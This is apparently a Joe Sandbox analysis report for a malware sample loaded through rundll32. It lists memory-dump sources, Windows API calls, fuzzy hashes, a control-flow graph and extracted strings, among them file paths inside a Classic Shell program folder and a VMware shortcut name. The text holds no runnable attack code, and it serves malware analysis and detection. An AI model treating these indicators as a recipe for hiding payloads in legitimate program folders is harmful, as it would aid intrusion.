                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                    • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetMessageW.USER32 ref: 00816038
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • Sleep.KERNEL32 ref: 00815FC0
                    Strings
                    • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                    • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                    • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                    • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                    • \VMware Workstation.lnk, xrefs: 00815F58
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesFileMessageSleep
                    • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                    • API String ID: 2390311571-3073936675
                    • Opcode ID: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                    • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                    • Opcode Fuzzy Hash: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                    • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • LeaveCriticalSection.KERNEL32 ref: 00414771
                    • EnterCriticalSection.KERNEL32 ref: 00414847
                    • LeaveCriticalSection.KERNEL32 ref: 00414880
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$Leave$Enter
                    • String ID:
                    • API String ID: 2978645861-0
                    • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                    • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 113 436960-436983 call 411140 GetFileAttributesW 116 436989-436991 113->116 117 436a4e-436a56 GetLastError 113->117 120 436993-43699d 116->120 121 4369a2-4369a4 116->121 118 436a79-436a7c 117->118 119 436a58-436a5b 117->119 122 436a81-436a8d 118->122 119->118 123 436a5d-436a63 119->123 120->122 124 4369a6-4369db CreateFileW 121->124 125 4369f8-4369fe 121->125 123->118 128 436a65-436a68 123->128 124->122 129 4369e1-4369f3 CloseHandle 124->129 126 436a00-436a03 125->126 127 436a05-436a3a call 420600 125->127 126->122 134 436a49-436a4c 127->134 135 436a3c-436a47 call 420550 127->135 128->118 131 436a6a-436a6d 128->131 129->122 131->118 133 436a6f-436a72 131->133 133->118 136 436a74-436a77 133->136 134->122 135->122 136->118 137 436a7e 136->137 137->122
                    APIs
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: File$AttributesCloseCreateErrorHandleLast
                    • String ID:
                    • API String ID: 2927643983-0
                    • Opcode ID: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                    • Instruction ID: 98a77ccf81b0bcca3246d0e759f0e6111a319c85e2d8d3d3e5bdc5a1946655a4
                    • Opcode Fuzzy Hash: 45c71b4b7f66cbdff86984d3ecc73382b56bdf5e258aa0ca66effcb3267f1f5a
                    • Instruction Fuzzy Hash: BF216832B0821322E630B5A9A46475B1861578F7B8F2AF70FEC695B3D5CA7CCD81178D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetSystemDefaultUILanguage.KERNEL32 ref: 004154B7
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037953381.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037983339.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038014164.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038041839.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038074325.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038103707.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038126018.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038153983.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038193700.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038216503.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038257627.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038294020.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038334731.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038368741.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038402448.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038432786.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038466217.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038506104.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038542451.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038571439.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038604156.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038632394.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038661769.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038693976.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038728285.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038776875.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038798606.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038824856.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038853844.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038873802.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038907523.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4038932447.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_18_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: DefaultLanguageSystem
                    • String ID:
                    • API String ID: 4166810957-0
                    • Opcode ID: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                    • Instruction ID: bb2f8fdc298b904da0d8311a6692b3c5818f4a7b9ef0247cd5b56ed5edd11b73
                    • Opcode Fuzzy Hash: 97b19cd40701ddebf6783f0beb1e79e79877712c282ebd63ac355bdf4c4110e4
                    • Instruction Fuzzy Hash: A651B576210B8089DB20EF76D8953D92762FB8479CF905427EA0D8BB59DF78C9C5C384
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetModuleFileNameW.KERNEL32 ref: 004155BB
                    Memory Dump Source
                    • Source File: 00000012.00000002.4037078640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000012.00000002.4037025114.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037078640.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037762797.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037794745.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037825446.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037854203.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037888059.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000012.00000002.4037921418.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
